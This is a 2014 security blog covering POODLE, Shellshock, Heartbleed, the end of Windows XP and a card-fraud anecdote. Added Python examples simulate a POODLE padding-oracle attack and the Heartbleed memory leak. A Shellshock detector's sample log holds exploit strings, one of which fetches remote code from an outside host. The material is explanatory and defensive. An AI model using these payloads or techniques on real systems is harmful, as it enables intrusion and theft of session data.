Thursday, 16 October 2014

SSL 3.0 POODLE Vulnerability


A vulnerability in SSL version 3.0 (SSL 3.0), CVE-2014-3566, known as "POODLE", was announced on 14 October 2014. It lets a man-in-the-middle attacker recover plaintext, such as session cookies, from an SSL 3.0 connection that uses a CBC cipher suite: SSL 3.0 checks only the last byte of the CBC padding, and that lenient check gives an attacker who can tamper with ciphertext a padding oracle.

SSL 3.0 is nearly 18 years old, but support for it remains widespread. Most importantly, nearly all browsers support SSL 3.0, and browsers will retry failed connections with older protocol versions, including SSL 3.0, to work around bugs in HTTPS servers. A network attacker can cause those connection failures and so force a client and server that both support TLS down to SSL 3.0, then exploit this issue.

Reference material can be found here:
http://googleonlinesecurity.blogspot.ie/2014/10/this-poodle-bites-exploiting-ssl-30.html

The generic advice is that SSL 3.0 should be disabled in all affected applications in favour of the newer protocol, TLS (Transport Layer Security). Where SSL 3.0 cannot be switched off yet, clients and servers should support TLS_FALLBACK_SCSV, which lets a server detect and reject an attacker-induced downgrade from a TLS version it supports.
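The downgrade described above is only half of the attack; the other half is the padding oracle that SSL 3.0's record layer hands to anyone who can tamper with ciphertext. The following Python model is added here and is not part of the ssh.com text or of any SSL implementation: a toy block cipher stands in for AES/3DES (a four-round Feistel permutation built from SHA-256, so only the standard library is needed), records are laid out and padding is checked the way SSL 3.0 and TLS 1.0 do it, and the attacker shifts the request so that one secret byte sits at the end of a block, copies that block over the all-padding final block, and watches whether the server accepts the forged record. Each acceptance reveals one byte; with TLS's padding rule (every padding byte must equal the length byte) the same forgery never passes. The key, the secret cookie and the traffic are all constructed inside the script.

```python
# Added example, not code from the post or from any SSL implementation: a toy
# model of the POODLE padding oracle. The block cipher is a 4-round Feistel
# permutation built from SHA-256 (stand-in for AES/3DES so only the standard
# library is needed); the record layout and padding checks follow SSL 3.0 /
# TLS 1.0; key, secret and traffic are all constructed in-process.
import hashlib
import hmac
import random

BLOCK = 16    # block size of the stand-in cipher
MAC_LEN = 20  # SSL 3.0 used 20-byte SHA-1 MACs; truncated HMAC-SHA256 here

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def mac(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()[:MAC_LEN]

def seal(key, iv, data, rng, tls=False):
    """Encrypt one record: data || MAC || padding, last byte = padding length."""
    body = data + mac(key, data)
    pad_len = BLOCK - 1 - len(body) % BLOCK   # 0..15 bytes before the length byte
    if tls:   # TLS: every padding byte carries the length
        padding = bytes([pad_len]) * (pad_len + 1)
    else:     # SSL 3.0: the padding bytes are undefined, only the last byte matters
        padding = bytes(rng.randrange(256) for _ in range(pad_len)) + bytes([pad_len])
    return cbc_encrypt(key, iv, body + padding)

def server_accepts(key, iv, ct, tls=False):
    """Decrypt, check padding the way SSL 3.0 (or TLS) does, then verify the MAC."""
    pt = cbc_decrypt(key, iv, ct)
    n = pt[-1]
    if n >= BLOCK or (tls and pt[-n - 1:] != bytes([n]) * (n + 1)):
        return False
    body = pt[:len(pt) - n - 1]
    return hmac.compare_digest(body[-MAC_LEN:], mac(key, body[:-MAC_LEN]))

def recover_secret(key, secret, tls=False, max_tries=5000, seed=2014):
    """Man-in-the-middle, byte-at-a-time recovery of `secret`. The attacker only
    chooses the request prefix/suffix lengths (URL path and POST body in the real
    attack) and observes accept/reject; it never reads `key` or `secret`. A fresh
    IV per request stands in for the varying ciphertexts of real requests."""
    rng = random.Random(seed)
    recovered = b""
    for k in range(len(secret)):
        prefix_len = 2 * BLOCK - 1 - k % BLOCK   # secret[k] -> last byte of block i
        i = 1 + k // BLOCK
        suffix_len = -(prefix_len + len(secret) + MAC_LEN) % BLOCK  # last block = padding only
        data = b"/" * prefix_len + secret + b"&" * suffix_len
        for _ in range(max_tries):
            iv = bytes(rng.randrange(256) for _ in range(BLOCK))
            ct = seal(key, iv, data, rng, tls)                   # the genuine client record
            blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
            forged = ct[:-BLOCK] + blocks[i + 1]                 # padding block := target block
            if server_accepts(key, iv, forged, tls):
                # D(C_i) xor C_{n-2} ended in BLOCK-1, so P_i[-1] = (BLOCK-1) ^ C_{i-1}[-1] ^ C_{n-2}[-1]
                recovered += bytes([(BLOCK - 1) ^ blocks[i][-1] ^ blocks[-2][-1]])
                break
        else:
            return None   # the oracle never fired: this padding rule is not SSL 3.0's
    return recovered

DEMO_KEY = hashlib.sha256(b"constructed demo key").digest()
DEMO_SECRET = b"auth=s3cr3t"   # constructed; stands in for a session cookie

if __name__ == "__main__":
    print("SSL 3.0 padding:", recover_secret(DEMO_KEY, DEMO_SECRET))
    print("TLS padding:   ", recover_secret(DEMO_KEY, DEMO_SECRET, tls=True, max_tries=200))
```

Expect roughly 256 client requests per recovered byte, which is why the real attack drives the victim's browser with JavaScript to generate the traffic. Note that the MAC in the forged record is intact, so a stronger MAC would not help; the fix is the protocol version, not the cipher suite's hash.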


source text: www.ssh.com

Friday, 26 September 2014

Shellshock Update

The Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) has been rated 10/10 for criticality and should therefore be addressed as soon as possible. To remedy the issue you will first need to work out which systems are affected, then apply the relevant vendor patches. Note that the first patch for CVE-2014-6271 was incomplete (that is what CVE-2014-7169 covers), so check that the Bash build you end up with includes the follow-up fix.

Any system running Linux or another Unix-like OS that ships Bash could potentially be at risk, including versions of OS X, so keep in mind all appliances (routers, firewalls, NAS devices and the like) as well as servers and workstations when investigating your estate. Exposure is greatest where an Internet-facing service passes attacker-supplied data to Bash through environment variables, for example CGI scripts under a web server.
Most vendors have by now issued statements on the status of their products, so the vendor websites are always a good place to start.

The CERT-UK alert below has more information on the vulnerability and how to test for it.

https://www.cert.gov.uk/resources/alerts/update-bash-vulnerability-aka-shellshock/
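Two checks worth having to hand while working through the estate, written for this post as an added example (not from CERT-UK, Fortinet or the original text): a local probe that runs the installed bash with a crafted environment variable and reports whether the trailing command executes (the mechanism the Fortinet text below describes under "How does it work?"), and a scan over web access-log lines for the "() {" function-definition prefix that exploit attempts carry in request headers, which is the same string the IPS signatures mentioned below match. The log lines are constructed for the example; the probe covers CVE-2014-6271 only.

```python
# Added example (not from the original post or the Fortinet advisory): a
# local probe for the Bash environment-variable bug and a scan of web
# access-log lines for the payload that exploits of it carry. The probe
# runs the installed bash with a crafted variable; the log lines are
# constructed, not captured traffic.
import re
import shutil
import subprocess

# A function definition followed by an extra command. Unpatched bash ran
# the trailing command while importing the function at startup; patched
# bash defines (or refuses) the function and never runs what follows it.
PROBE = "() { :;}; echo SHELLSHOCK_VULNERABLE"


def bash_is_vulnerable(bash=None):
    """True if the local bash executes the trailing command, False if not,
    None when no bash binary is available to test (CVE-2014-6271 probe only;
    the CVE-2014-7169 parser bug needs a different, file-writing probe)."""
    bash = bash or shutil.which("bash")
    if bash is None:
        return None
    try:
        res = subprocess.run([bash, "-c", "echo probe done"],
                             env={"PATH": "/usr/bin:/bin", "X": PROBE},
                             capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    return "SHELLSHOCK_VULNERABLE" in res.stdout


# The function-definition prefix bash looked for, with the spacing variants
# seen in the wild. CGI hands request headers to scripts as environment
# variables, which is how the payload reaches bash over HTTP.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def find_shellshock_attempts(log_lines):
    """Return (line_number, client_ip, fragment) for each line carrying a payload."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = SHELLSHOCK_RE.search(line)
        if m:
            hits.append((n, line.split(" ", 1)[0], line[m.start():m.start() + 48]))
    return hits


# Constructed Apache combined-format lines: two exploit attempts carried in
# the User-Agent / Referer fields and one ordinary request.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \\"wget http://203.0.113.9/x -O /tmp/x\\""',
    '198.51.100.7 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 210 '
    '"(){ :;}; /usr/bin/id" "curl/7.37.0"',
]

if __name__ == "__main__":
    print("local bash vulnerable:", bash_is_vulnerable())
    for n, ip, fragment in find_shellshock_attempts(SAMPLE_ACCESS_LOG):
        print(f"line {n} from {ip}: {fragment}")
```

The regex is deliberately loose so it catches the spacing variants, which means it should be run against the raw header fields rather than whole log lines if your logs contain user-supplied text that legitimately includes "() {"; on a patched host the probe prints only "probe done" and the function returns False.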

ShellShock - Fortinet's Response

Fortinet's response to the Shellshock vulnerability.

What is Shellshock?

Shellshock is a vulnerability discovered in the ubiquitous GNU Bourne Again Shell (Bash) program which can allow an attacker to remotely execute arbitrary code on a target system. Bash is commonly used in many Linux, Unix and Mac OS X operating systems. It also likely impacts Apple's iOS mobile operating system and Google's Android OS.

Who is affected?
While Bash is a local shell, it is used in many programs on the Internet to set environment variables which are then used in the execution of other programs.

How does it work?
Programs often use environment variables in their operations. If specially crafted extra code is added inside an environment variable, the operating system will execute that code. For example:

Should I be worried?
If you are the owner or maintainer of a server or other Internet infrastructure, you should patch your machines as quickly as possible. The nature of this exploit is such that it would be trivial for an attacker to compromise your machine(s) or create a self-propagating worm, reminiscent of the SQL Slammer worm in 2003, leading to potential Distributed Denial of Service attacks.

What can I do? How can I check my exposure?
On the server side of the equation, there are multiple things you should do as a best course of action to provide the highest level of security to your employees, users and customers:
It is important to note that FortiOS is not affected by Shellshock. FortiOS does not use the Bash shell.
Ensure you have appropriate IPS signatures deployed to monitor and mitigate any potential attacks on your infrastructure. Fortinet is issuing a Hot Update to our customers with IPS signatures to detect and prevent Shellshock attacks. This signature will be available in the next few hours. In situations such as this, our threat research teams are able to respond to urgent or immediate security incidents promptly to protect our customers (and our customers' customers) from exploitation.
Ensure you have deployed the latest AV DB packages to your systems and endpoints. Fortinet issued a Hot Update to our customers to detect and prevent Shellshock attacks.
Deploy the patches to affected systems as soon as possible.
What about Fortinet? How did Fortinet respond?
Fortinet released Bash.Function.Definitions.Remote.Code.Execution via Hot Update 5.552 on the afternoon of September 25th.
FortiGuard's PSIRT (Product Security and Incident Response Team) became aware of the issue on Wednesday, September 24th when the bug was publicly disclosed. Our team developed an in-house POC immediately to verify the vulnerability and started to determine the extent of our exposure in our products.
PSIRT issued a security advisory - FG-IR-14-030 on Thursday with initial information and our industry-leading security research team concurrently created initial IPS signatures to assist customers in determining if attackers attempting to exploit Shellshock were targeting their systems.
Patch development began in the morning of Thursday September 25th, and our QA teams have started testing the updates.
Many of our products, including FortiOS, were not affected by Shellshock and a patch is not required. The product security advisory lists our affected products.

http://www.fortiguard.com/advisory/FG-IR-14-030/

Text taken from Fortinet Blog as is. Tech-2 does not own this text and has not verified the content.

Friday, 11 April 2014

HeartBleed Vulnerability

It's been quite a while since a vulnerability like this has been uncovered. There is no doubt that this is a serious one, and it affects many products. What makes it a problem is not only that the consequences are serious (an unauthenticated client can read up to 64 KB of server memory per heartbeat request, which can include private keys, session cookies and passwords) but also that it is not hard to exploit and normally leaves no trace in application logs. Affected versions of OpenSSL have been in circulation since OpenSSL 1.0.1 was released in early 2012, so the impact up to now is unknown.
Recommendations are to patch the affected products, then re-issue certificates with new private keys and revoke the old ones (the old keys may already have been read out of memory, so keeping them defeats the patch), and ensure users change their passwords once the fix is in place.

OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 are affected (CVE-2014-0160); the 0.9.8 and 1.0.0 branches are not vulnerable. OpenSSL advise that affected users should upgrade to
OpenSSL 1.0.1g, and users unable to upgrade immediately can opt to recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. 1.0.2 will be fixed in 1.0.2-beta2.
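To make concrete what the -DOPENSSL_NO_HEARTBEATS workaround removes and what 1.0.1g fixes, here is the bug modelled in Python. This is an added example, not OpenSSL's code: it mirrors the shape of the heartbeat handler, with a vulnerable version that trusts the two-byte payload_length field in the message and a fixed version that applies the bounds check 1.0.1g added; "process memory" is a constructed bytearray with made-up secrets placed after the received record, and the message format is the one from RFC 6520 (type, length, payload, at least 16 bytes of padding).

```python
# Added example (not OpenSSL's code, not from the original post): the
# heartbeat bug modelled in Python. An RFC 6520 heartbeat message is
# type (1 byte) | payload_length (2 bytes) | payload | padding (>= 16 bytes).
# The vulnerable code trusted payload_length and copied that many bytes from
# the receive buffer into the reply; the 1.0.1g fix checks the claim against
# the number of bytes that actually arrived. "Memory" is a constructed
# bytearray: the record, then made-up secrets, then zeros.
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16


def build_heartbeat(payload, claimed_length=None):
    """Client side. An honest request claims len(payload); the attack claims more."""
    claimed = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HB_REQUEST, claimed) + payload + b"\x00" * MIN_PADDING


def vulnerable_handler(memory, record_len):
    """Before the fix: echo payload_length bytes, however many were received."""
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:3]))
    if hbtype != HB_REQUEST:
        return None
    echoed = bytes(memory[3:3 + payload_len])      # reads past the end of the record
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def fixed_handler(memory, record_len):
    """After the fix: silently discard a record whose claimed length does not fit."""
    if 1 + 2 + MIN_PADDING > record_len:            # too short for even an empty payload
        return None
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:3]))
    if hbtype != HB_REQUEST or 1 + 2 + payload_len + MIN_PADDING > record_len:
        return None
    echoed = bytes(memory[3:3 + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


# Constructed "process memory": whatever happened to sit next to the record.
SECRETS = b"Cookie: session=4f3c9a; -----BEGIN RSA PRIVATE KEY-----"


def simulate(handler, payload, claimed_length=None):
    """Put the record in a buffer in front of SECRETS and run the handler."""
    record = build_heartbeat(payload, claimed_length)
    memory = bytearray(record + SECRETS + b"\x00" * 65536)
    return handler(memory, len(record))


def leaked(response, payload):
    """Bytes in the echo beyond what the client actually sent."""
    if response is None:
        return b""
    _, n = struct.unpack("!BH", response[:3])
    return response[3 + len(payload):3 + n]


if __name__ == "__main__":
    honest = simulate(vulnerable_handler, b"ping")
    print("honest echo leaks:", leaked(honest, b"ping"))
    attack = simulate(vulnerable_handler, b"ping", 65535)
    print("attack leaks:", leaked(attack, b"ping")[:80])
    print("fixed handler on attack:", simulate(fixed_handler, b"ping", 65535))
```

The honest exchange is identical under both handlers, which is why the bug sat unnoticed: nothing about normal traffic exercises the missing check. With the length field set to 65535 the vulnerable handler returns about 64 KB of whatever followed the record in memory, and the fixed handler drops the message without replying, as RFC 6520 requires for malformed heartbeats.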

The list below gives links to advisories for some of the affected products. There are many more.

VMWare
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2076225

Fortinet
http://www.fortiguard.com/advisory/FG-IR-14-011

Juniper
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623

Cisco
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed

Watchguard
http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap

Aruba
http://www.arubanetworks.com/support/alerts/aid-040814.asc

CheckPoint
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173

RedHat
https://access.redhat.com/security/cve/CVE-2014-0160

F5
http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html

McAfee

https://kc.mcafee.com/corporate/index?page=content&id=SB10071

Symantec
http://www.symantec.com/business/support/index?page=content&id=TECH216558

Ubuntu
http://www.ubuntu.com/usn/usn-2165-1/

FreeBSD
http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc

RedHat (announcement)
https://access.redhat.com/site/announcements/781953

Saturday, 1 March 2014

If you are still running Windows XP then you should migrate.

As we know, many home users and businesses are still running Windows XP as their desktop operating system. With support (Service Pack 3 being the last supported level) ending in April this year (2014), the likelihood of increased malware and viruses on these systems is very high. This should not be taken lightly: the threat will keep rising the older the operating system gets. If a vulnerability is found and remains unpatched, businesses are taking unnecessary risks; once support is discontinued there will be no patches, so the security holes will remain open, waiting to be exploited. Contrary to what many believe, this isn't Microsoft looking for ways to make more money. XP is three generations old if you count Vista, Windows 7 and now Windows 8. It's time to upgrade Windows or migrate to a different OS completely.

Credit Card Fraud Warning

I received a voicemail, then a text, then a call to my home phone from the bank asking me to call them. I verified the number was legitimate and contacted the bank. They didn't ask any questions but were able to verify my recent transactions, so they were genuine. However, twenty minutes prior to the call someone had placed an order on Play.com for £500 using my details. Luckily for me the bank had the sense to block the transaction and contact me. I had to cancel my card. I decided to contact Play.com to tell them what had happened, and after some cross-referencing they could see that an order had been placed on a very recently created account using my bank details, but with a different delivery address. The customer services lady was a bit shocked when she then cross-referenced the delivery address to find that six other orders using other people's details had also been placed that day for delivery to that address. Unfortunately for those people it looks as if the transactions had at that point completed. Play.com were very grateful for my calling them as they could stop the deliveries and hopefully let the other card holders know. The issue here is that somehow these details had been leaked, most likely from a hack against either their own or, more likely, another online vendor's system. I wonder how long this will take to be found. I immediately accessed all my accounts for various vendors, removed all card details and changed credentials. I know this was not a phishing attack as I never click on or use anything sent in an email. So be warned.... I now have something else to add to my list of things to follow up...

NotPetya Cyberwarfare ?

It is interesting that many are regarding this latest NotPetya attack as Cyberwarfare and not Ransomware. The main reasons for this assump...